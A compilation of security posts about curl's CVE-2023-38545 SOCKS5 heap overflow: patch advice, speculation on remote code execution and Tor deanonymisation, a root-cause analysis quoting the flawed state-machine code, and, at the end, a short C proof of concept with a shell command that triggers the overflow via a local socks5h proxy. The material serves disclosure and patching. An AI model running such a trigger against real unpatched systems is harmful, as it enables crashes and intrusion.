Forgive me, I was left unsupervised.

https://www.infosecworrier.dk/blog/2023/10/VulnMgmt.html

#VulnerabilityManagement #CVE202338545 #curl #Security #CriticalInfrastructure #rant #Security #Cyber #OT #Context #ThreatIntel #CTI

If you haven't or are still waiting for the updated libcurl package, now would be a good time to think about all of the software on your system which uses libcurl. Note: docker images, statically compiled binaries, and Electron apps probably contain their own copies of libcurl.

Debian

Redhat

#curl #CVE_2023_38545 #CVE202338545

Some thoughts on why the #curl #CVE202338545 #vulnerability likely is worse than you might initially think:

• The heap memory being overwritten might contain string(s) that end up (in)directly executed by shell if system() or similar functions are used by the application on heap-based strings. This could allow trivial RCE in certain scenarios, especially if you can have nearly unlimited attempts to “get lucky” with the heap arrangement, or can massage the heap in a way to make it more likely to get suitable arrangement. Whether a specific app is susceptible for this can’t easily be determined without analyzing each app in the environment they’re used in.

• Tor users might be at risk, if they’re using curl or libcurl based application with the Tor proxy as the communication with the proxy is commonly using the affected socks5h:// protocol. This risk could manifest itself in several ways: First in the abovementioned RCE threat might allow code execution. Secondly, if the heap memory overwritten will be included in other remote network request (for example part of headers, POST body or similar), it could allow “tagging” Tor users and potentially deanonymize them.

• Thinking that HTTPS will keep you safe is a fallacy. Countless of untrusted sites are accessed over HTTPS (easy example is forums or sites where other users can contribute to).

Curl/libcurl has a very large install base with wide range of use cases. Just because your use cases aren’t affected doesn’t mean the vulnerability can be dismissed as non-issue. #infosec #threatmodeling

Need to check curl patch status across many distros?

https://repology.org/project/curl/versions

#CVE202338545
#CVE_2023_38545

#CVE202338546
#CVE_2023_38546
#curl

Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?

The main reason for this is the type of code structure in question. In general state engines are quite difficult for static analysis tools, since as the name implies the state of the various variables depend on runtime state changes.

The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.

Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:

bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

The INIT state then set the “socks5_resolve_local” to TRUE if the host name is too long:

/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}

But this check is *only* done in INIT state. When the state is anything else, the initial value is used.

Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:

if(!socks5_resolve_local) {
if (… sx->hostname is literal IPv6 address …) {
… use ipv6 address direct …
}
else if (… sx->hostname is literal IPv4 address …) {
… use ipv4 address direct …
}
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
}
As “socks5_resolve_local” flag is FALSE for the excessively long hostname the “socksreq” heap buffer will be overflown by the memcpy call.

There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.

#vulnerability #staticanalysis #infosec

Si vous me cherchez, je suis en train de mettre à jour curl.

#OnVaTousMourir #CVE202338545

"🚨 curl Vulnerability Alert: SOCKS5 Heap Buffer Overflow 🚨"

A critical heap buffer overflow vulnerability has been identified in curl, specifically in the SOCKS5 proxy handshake. When curl is instructed to pass the hostname to the SOCKS5 proxy for resolution, a hostname exceeding 255 bytes should trigger local name resolving. However, due to a bug, a slow SOCKS5 handshake might erroneously copy an overly long hostname to the target buffer instead of just the resolved address, causing a potential overflow. 🐛💻🔥

This flaw, tagged as CVE-2023-38545, affects libcurl versions 7.69.0 to 8.3.0 and has been assigned a high severity rating. The vulnerability was introduced when the SOCKS5 handshake code transitioned from a blocking function to a non-blocking state machine. The issue has been resolved in curl version 8.4.0, and users are urged to upgrade or apply patches to mitigate risks. 🛡️🔄

Source: curl - CVE-2023-38545

Tags: #curl #Vulnerability #Cybersecurity #CVE202338545 #BufferOverflow #InfoSec #PatchManagement #CyberHygiene

👥 Credits: Reported and patched by Jay Satiro. A heartfelt thanks to Jay for enhancing the security of the digital realm!

🔗 MITRE CVE-2023-38545

🛠️ Recommendations:

#curl CVE turned out to be not very exciting nor severe. Similar to the OpenSSL "critical" bug earlier, you mostly just see people hyping up pre-disclosures to be early on that hype train.

#cve202338545

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.

#infosec